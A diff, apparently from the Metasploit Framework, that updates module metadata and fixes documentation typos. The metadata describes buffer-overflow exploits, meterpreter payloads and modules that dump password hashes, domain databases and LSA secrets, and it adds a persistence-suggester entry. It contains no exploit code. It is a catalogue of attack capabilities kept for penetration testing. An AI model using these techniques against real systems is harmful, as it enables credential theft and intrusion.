+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
  "exploit_windows/pop3/seattlelab_pass": {
    "name": "Seattle Lab Mail 5.5 POP3 Buffer Overflow",
    "fullname": "exploit/windows/pop3/seattlelab_pass",
@@ -199844,6 +201556,7 @@
    ],
    "description": "This module exploits a stack based buffer overflow found in the SNMP\n          NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is\n          triggered when sending an overly long string to the listening service\n          on port 2001.",
    "references": [
+      "CVE-2011-10032",
      "OSVDB-75798",
      "BID-49747",
      "URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt",
@@ -199858,7 +201571,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2025-06-06 12:39:33 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/sunway_force_control_netdbsrv",
@@ -202797,6 +204510,7 @@
    ],
    "description": "This module exploits a vulnerability found in Sysax's SSH service.  By\n          supplying a long username, the SSH server will copy that data on the stack\n          without proper bounds checking, therefore allowing remote code execution\n          under the context of the user.  Please note that previous versions\n          (before 5.53) are also affected by this bug.",
    "references": [
+      "CVE-2012-10060",
      "OSVDB-79689",
      "URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html",
      "EDB-18535"
@@ -202810,7 +204524,7 @@
      "Sysax 5.53 on Win XP SP3 / Win2k3 SP0",
      "Sysax 5.53 on Win2K3 SP1/SP2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/ssh/sysax_ssh_username.rb",
    "is_install_path": true,
    "ref_name": "windows/ssh/sysax_ssh_username",
@@ -251956,7 +253670,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-09 07:19:14 +0000",
+    "mod_time": "2025-09-26 06:11:40 +0000",
    "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "php/meterpreter_reverse_tcp",
@@ -257945,7 +259659,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_named_pipe",
@@ -257980,7 +259694,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_tcp",
@@ -258015,7 +259729,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_http",
@@ -258050,7 +259764,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_https",
@@ -258085,7 +259799,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_ipv6_tcp",
@@ -258120,7 +259834,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 06:11:40 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_tcp",
@@ -264211,7 +265925,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_bind_named_pipe",
@@ -264246,7 +265960,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_bind_tcp",
@@ -264281,7 +265995,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_http",
@@ -264316,7 +266030,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_https",
@@ -264351,7 +266065,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 03:54:58 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp",
@@ -264386,7 +266100,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-08 10:19:25 +0000",
+    "mod_time": "2025-09-26 06:11:40 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_tcp",
@@ -265780,14 +267494,16 @@
      "theLightCosine <theLightCosine@metasploit.com>"
    ],
    "description": "Post module to dump the password hashes for all users on an AIX system.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "AIX",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-26 16:28:15 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/aix/hashdump.rb",
    "is_install_path": true,
    "ref_name": "aix/hashdump",
@@ -265860,7 +267576,8 @@
    "description": "Post Module to dump the password hashes for Android System. Root is required.\n          To perform this operation, two things are needed.  First, a password.key file\n          is required as this contains the hash but no salt.  Next, a sqlite3 database\n          is needed (with supporting files) to pull the salt from.  Combined, this\n          creates the hash we need.  Samsung based devices change the hash slightly.",
    "references": [
      "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/",
-      "URL-https://hashcat.net/forum/thread-2202.html"
+      "URL-https://hashcat.net/forum/thread-2202.html",
+      "ATT&CK-T1003"
    ],
    "platform": "Android",
    "arch": "",
@@ -265868,7 +267585,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-27 01:56:49 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/android/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "android/gather/hashdump",
@@ -266271,14 +267988,16 @@
      "bcoles <bcoles@gmail.com>"
    ],
    "description": "Post module to dump the password hashes for all users on a BSD system.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "BSD",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-27 02:09:41 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/bsd/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "bsd/gather/hashdump",
@@ -267880,7 +269599,8 @@
    "references": [
      "URL-https://github.com/rbowes-r7/refreshing-mcp-tool",
      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
-      "URL-https://support.f5.com/csp/article/K97843387"
+      "URL-https://support.f5.com/csp/article/K97843387",
+      "ATT&CK-T1003"
    ],
    "platform": "Linux,Unix",
    "arch": "",
@@ -267888,7 +269608,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-13 09:23:28 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/linux/gather/f5_loot_mcp.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/f5_loot_mcp",
@@ -268043,14 +269763,16 @@
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
    "description": "Post Module to dump the password hashes for all users on a Linux System",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "Linux",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-27 12:23:56 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/linux/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/hashdump",
@@ -268087,7 +269809,8 @@
    "description": "This module gathers the encrypted passwords stored by Password Manager\n          Pro and decrypt them using key materials stored in multiple\n          configuration files.",
    "references": [
      "URL-https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/",
-      "URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py"
+      "URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py",
+      "ATT&CK-T1003"
    ],
    "platform": "Linux,Unix",
    "arch": "",
@@ -268095,7 +269818,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-02 14:03:15 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/linux/gather/manageengine_password_manager_creds.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/manageengine_password_manager_creds",
@@ -268133,7 +269856,9 @@
      "URL-https://github.com/huntergregal/mimipenguin",
      "URL-https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1772919",
      "URL-https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490",
-      "CVE-2018-20781"
+      "CVE-2018-20781",
+      "ATT&CK-T1003.007",
+      "ATT&CK-T1003.008"
    ],
    "platform": "Linux",
    "arch": "x86, x64, aarch64",
@@ -268141,7 +269866,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-13 09:23:28 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/linux/gather/mimipenguin.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/mimipenguin",
@@ -268213,7 +269938,8 @@
    ],
    "description": "This module grab OpenVPN credentials from a running process\n          in Linux.\n\n          Note: --auth-nocache must not be set in the OpenVPN command line.",
    "references": [
-      "URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh"
+      "URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh",
+      "ATT&CK-T1003.007"
    ],
    "platform": "Linux",
    "arch": "",
@@ -268221,7 +269947,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-02 23:29:48 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/linux/gather/openvpn_credentials.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/openvpn_credentials",
@@ -268460,7 +270186,8 @@
      "URL-https://github.com/shmilylty/vhost_password_decrypt",
      "CVE-2022-22948",
      "URL-https://pentera.io/blog/information-disclosure-in-vmware-vcenter/",
-      "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb"
+      "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb",
+      "ATT&CK-T1003"
    ],
    "platform": "Linux,Unix",
    "arch": "",
@@ -268468,7 +270195,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/linux/gather/vcenter_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/vcenter_secrets_dump",
@@ -271802,7 +273529,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-21 10:45:08 +0000",
+    "mod_time": "2025-09-25 16:38:50 +0000",
    "path": "/modules/post/multi/recon/local_exploit_suggester.rb",
    "is_install_path": true,
    "ref_name": "multi/recon/local_exploit_suggester",
@@ -271865,6 +273592,43 @@
    "needs_cleanup": null,
    "actions": []
  },
+  "post_multi/recon/persistence_suggester": {
+    "name": "Persistence Exploit Suggester",
+    "fullname": "post/multi/recon/persistence_suggester",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module suggests persistence modules that can be used.\n          The modules are suggested based on the architecture and platform\n          that the user has a shell opened as well as the available exploits\n          in meterpreter.\n          It's important to note that not all modules will be checked.\n          Exploits are chosen based on these conditions: session type,\n          platform, architecture, and required default options.",
+    "references": [],
+    "platform": "AIX,Android,Apple_iOS,Arista,BSD,BSDi,Brocade,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Mikrotik,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-09-25 16:38:50 +0000",
+    "path": "/modules/post/multi/recon/persistence_suggester.rb",
+    "is_install_path": true,
+    "ref_name": "multi/recon/persistence_suggester",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [],
+      "Reliability": [],
+      "SideEffects": []
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
  "post_multi/recon/reverse_lookup": {
    "name": "Reverse Lookup IP Addresses",
    "fullname": "post/multi/recon/reverse_lookup",
@@ -272873,14 +274637,16 @@
      "joev <joev@metasploit.com>"
    ],
    "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n          versions 10.3 to 10.14.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003"
+    ],
    "platform": "OSX",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-01 02:49:28 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/osx/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/hashdump",
@@ -273507,14 +275273,16 @@
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
    "description": "Post module to dump the password hashes for all users on a Solaris system.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "Solaris",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 00:19:25 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/solaris/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "solaris/gather/hashdump",
@@ -274132,7 +275900,8 @@
    ],
    "description": "This module uses the registry to extract the stored domain hashes that have been\n          cached as a result of a GPO setting. The default setting on Windows is to store\n          the last ten successful logins.",
    "references": [
-      "URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb"
+      "URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb",
+      "ATT&CK-T1003.005"
    ],
    "platform": "Windows",
    "arch": "",
@@ -274140,7 +275909,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/cachedump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/cachedump",
@@ -274578,14 +276347,16 @@
      "tebo <tebo@attackresearch.com>"
    ],
    "description": "This module harvests credentials found on the host and stores them in the database.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/windows/gather/credentials/credential_collector.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/credential_collector",
@@ -274657,14 +276428,16 @@
      "theLightCosine <theLightCosine@metasploit.com>"
    ],
    "description": "This module attempts to copy the NTDS.dit database from a live Domain Controller\n          and then parse out all of the User Accounts. It saves all of the captured password\n          hashes, including historical ones.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.003"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/domain_hashdump",
@@ -274778,14 +276551,16 @@
      "Kx499"
    ],
    "description": "This module will enumerate the Microsoft Credential Store and decrypt the\n          credentials. This module can only access credentials created by the user the\n          process is running as.  It cannot decrypt Domain Network Passwords, but will\n          display the username and location.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/windows/gather/credentials/enum_cred_store.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/enum_cred_store",
@@ -274816,14 +276591,16 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
    "description": "This module will recover the LAPS (Local Administrator Password Solution) passwords,\n          configured in Active Directory, which is usually only accessible by privileged users.\n          Note that the local administrator account name is not stored in Active Directory,\n          so it is assumed to be 'Administrator' by default.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/windows/gather/credentials/enum_laps.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/enum_laps",
@@ -276985,14 +278762,16 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
    "description": "This module will collect cleartext Single Sign On credentials from the Local\n          Security Authority using the Kiwi (Mimikatz) extension. Blank passwords will not be stored\n          in the database.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.001"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/credentials/sso.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/sso",
@@ -277684,7 +279463,8 @@
    "description": "This module extracts the plain-text Windows user login password in Registry.\n          It exploits a Windows feature that Windows (2000 to 2008 R2) allows a\n          user or third-party Windows Utility tools to configure User AutoLogin via\n          plain-text password insertion in (Alt)DefaultPassword field in the registry\n          location - HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable\n          by all users.",
    "references": [
      "URL-http://support.microsoft.com/kb/315231",
-      "URL-http://core.yehg.net/lab/#tools.exploits"
+      "URL-http://core.yehg.net/lab/#tools.exploits",
+      "ATT&CK-T1003"
    ],
    "platform": "Windows",
    "arch": "",
@@ -277692,7 +279472,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/credentials/windows_autologin.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/windows_autologin",
@@ -277729,7 +279509,8 @@
      "CVE-2021-36934",
      "URL-https://github.com/GossiTheDog/HiveNightmare",
      "URL-https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652",
-      "URL-https://github.com/romarroca/SeriousSam"
+      "URL-https://github.com/romarroca/SeriousSam",
+      "ATT&CK-T1003.002"
    ],
    "platform": "Windows",
    "arch": "",
@@ -277737,7 +279518,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/windows_sam_hivenightmare",
@@ -279917,7 +281698,8 @@
    ],
    "description": "This module gathers a file using the raw NTFS device, bypassing some Windows restrictions\n          such as open file with write lock. Because it avoids the usual file locking issues, it can\n          be used to retrieve files such as NTDS.dit.",
    "references": [
-      "URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/"
+      "URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/",
+      "ATT&CK-T1003.003"
    ],
    "platform": "Windows",
    "arch": "",
@@ -279925,7 +281707,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-03 12:57:40 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/file_from_raw_ntfs.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/file_from_raw_ntfs",
@@ -280269,14 +282051,16 @@
      "hdm <x@hdm.io>"
    ],
    "description": "This module will dump the local user accounts from the SAM database using the registry",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.002"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/hashdump",
@@ -280347,14 +282131,16 @@
      "Rob Bathurst <rob.bathurst@foundstone.com>"
    ],
    "description": "This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:\n          HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt\n          code from cachedump.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.004"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/lsa_secrets.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/lsa_secrets",
@@ -280423,14 +282209,16 @@
      "smashery"
    ],
    "description": "This module creates a memory dump of a process (to disk) and downloads the file\n          for offline analysis.\n\n          Options for DUMP_TYPE affect the completeness of the dump:\n\n          \"full\" retrieves the entire process address space (all allocated pages);\n          \"standard\" excludes image files (e.g. DLLs and EXEs in the address space) as\n          well as memory mapped files. As a result, this option can be significantly\n          smaller in size.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.001"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/memory_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/memory_dump",
@@ -280546,14 +282334,16 @@
      "Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>"
    ],
    "description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n          It compresses all these files in a cabinet file called All.cab.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.003"
+    ],
    "platform": "Windows",
    "arch": "x86, x64",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/ntds_grabber.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/ntds_grabber",
@@ -280832,14 +282622,16 @@
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
    "description": "This will dump local accounts from the SAM Database. If the target\n          host is a Domain Controller, it will dump the Domain Account Database using the proper\n          technique depending on privilege level, OS and role of the host.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.002"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/smart_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/smart_hashdump",
@@ -281844,7 +283636,8 @@
    "description": "Manage kerberos tickets on a compromised host.",
    "references": [
      "URL-https://github.com/GhostPack/Rubeus",
-      "URL-https://github.com/wavvs/nanorobeus"
+      "URL-https://github.com/wavvs/nanorobeus",
+      "ATT&CK-T1003.004"
    ],
    "platform": "Windows",
    "arch": "",
@@ -281852,7 +283645,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-13 09:23:28 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/manage/kerberos_tickets.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/kerberos_tickets",
@@ -282313,7 +284106,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-09 10:51:17 +0000",
+    "mod_time": "2025-09-23 16:22:40 +0000",
    "path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/exec_powershell",
@@ -57,4 +57,4 @@ override.
 ```bash
 echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
 ```
-Now you should be able get reverse shells working
+Now you should be able to get reverse shells working
@@ -6,4 +6,4 @@
 * [Facts and myths about antivirus evasion with Metasploit](http://schierlm.users.sourceforge.net/avevasion.html)
 * [Using metasm to avoid antivirus detection ghost writing asm](https://web.archive.org/web/20200330111926/https://www.pentestgeek.com/penetration-testing/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm)

-There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the about articles should get you started.
+There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the above articles should get you started.
@@ -110,7 +110,7 @@ end

    * **Stability** - The Stability field describes how the exploit affects the system it's being run on, ex: `CRASH_SAFE`, `CRASH_OS_DOWN`
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
-    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.
+    * **SideEffects** - The SideEffects field describes the side effects caused by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

 ### Non-required fields

@@ -41,7 +41,7 @@ include Msf::Auxiliary::Scanner

 A couple of new things will be added to your module when you include this mixin. You will have a new datastore option named "RHOSTS", which allows the user to specify multiple hosts. There's a new "THREADS" option, which allows the number of threads to run during execution. There's also "ShowProgress" and "ShowProgressPercent" for tracking scan progress.

-Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanenr``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.
+Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanner``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.

 ## Templates

@@ -54,9 +54,9 @@ retrieve deployment packages from S3.
 The VPC or Virtual Private Cloud, an isolated local area network. Network access
 can be made available by assigning an Internet routable IP address to a host or
